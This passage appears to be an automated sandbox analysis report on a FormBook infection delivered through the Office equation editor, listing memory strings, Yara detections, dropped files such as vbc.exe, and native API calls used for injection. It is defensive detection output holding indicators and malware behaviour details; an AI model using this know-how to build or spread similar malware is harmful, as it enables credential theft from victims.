Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2208077400.000000000B149000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49167 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404EBC

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Drops certificate files (DER)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Jump to dropped file

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004181D0 NtCreateFile, 5_2_004181D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418280 NtReadFile, 5_2_00418280
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418300 NtClose, 5_2_00418300
Source: C:\Users\Public\vbc.exe Code function: 5_2_004183B0 NtAllocateVirtualMemory, 5_2_004183B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004181CA NtCreateFile, 5_2_004181CA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041827A NtReadFile, 5_2_0041827A
Source: C:\Users\Public\vbc.exe Code function: 5_2_004182FA NtClose, 5_2_004182FA
Source: C:\Users\Public\vbc.exe Code function: 5_2_009500C4 NtCreateFile,LdrInitializeThunk, 5_2_009500C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00950048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00950048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00950078 NtResumeThread,LdrInitializeThunk, 5_2_00950078
Source: C:\Users\Public\vbc.exe Code function: 5_2_009507AC NtCreateMutant,LdrInitializeThunk, 5_2_009507AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094F9F0 NtClose,LdrInitializeThunk, 5_2_0094F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094F900 NtReadFile,LdrInitializeThunk, 5_2_0094F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0094FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0094FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0094FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0094FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0094FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0094FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0094FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0094FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0094FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0094FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0094FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00950060 NtQuerySection, 5_2_00950060
Source: C:\Users\Public\vbc.exe Code function: 5_2_009501D4 NtSetValueKey, 5_2_009501D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095010C NtOpenDirectoryObject, 5_2_0095010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00950C40 NtGetContextThread, 5_2_00950C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_009510D0 NtOpenProcessToken, 5_2_009510D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00951148 NtOpenThread, 5_2_00951148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094F8CC NtWaitForSingleObject, 5_2_0094F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00951930 NtSetContextThread, 5_2_00951930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094F938 NtWriteFile, 5_2_0094F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FAB8 NtQueryValueKey, 5_2_0094FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FA20 NtQueryInformationFile, 5_2_0094FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FA50 NtEnumerateValueKey, 5_2_0094FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FBE8 NtQueryVirtualMemory, 5_2_0094FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FB50 NtCreateKey, 5_2_0094FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FC30 NtOpenProcess, 5_2_0094FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FC48 NtSetInformationFile, 5_2_0094FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_00951D80 NtSuspendThread, 5_2_00951D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FD5C NtEnumerateKey, 5_2_0094FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FE24 NtWriteVirtualMemory, 5_2_0094FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FFFC NtCreateProcessEx, 5_2_0094FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094FF34 NtQueueApcThread, 5_2_0094FF34
Source: C:\Users\Public\vbc.exe Code function: 5_1_004181D0 NtCreateFile, 5_1_004181D0
Source: C:\Users\Public\vbc.exe Code function: 5_1_00418280 NtReadFile, 5_1_00418280
Source: C:\Users\Public\vbc.exe Code function: 5_1_00418300 NtClose, 5_1_00418300
Source: C:\Users\Public\vbc.exe Code function: 5_1_004183B0 NtAllocateVirtualMemory, 5_1_004183B0
Source: C:\Users\Public\vbc.exe Code function: 5_1_004181CA NtCreateFile, 5_1_004181CA
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041827A NtReadFile, 5_1_0041827A
Source: C:\Users\Public\vbc.exe Code function: 5_1_004182FA NtClose, 5_1_004182FA
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk, 7_2_00B300C4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk, 7_2_00B307AC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk, 7_2_00B2F9F0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk, 7_2_00B2F900
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_00B2FAB8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_00B2FAE8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_00B2FAD0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_00B2FBB8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_00B2FB68
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FB50 NtCreateKey,LdrInitializeThunk, 7_2_00B2FB50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_00B2FC60
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk, 7_2_00B2FD8C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_00B2FDC0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_00B2FED0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk, 7_2_00B2FFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B310D0 NtOpenProcessToken, 7_2_00B310D0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B30078 NtResumeThread, 7_2_00B30078
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B30060 NtQuerySection, 7_2_00B30060
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B30048 NtProtectVirtualMemory, 7_2_00B30048
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B301D4 NtSetValueKey, 7_2_00B301D4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B3010C NtOpenDirectoryObject, 7_2_00B3010C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B31148 NtOpenThread, 7_2_00B31148
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2F8CC NtWaitForSingleObject, 7_2_00B2F8CC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B31930 NtSetContextThread, 7_2_00B31930
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2F938 NtWriteFile, 7_2_00B2F938
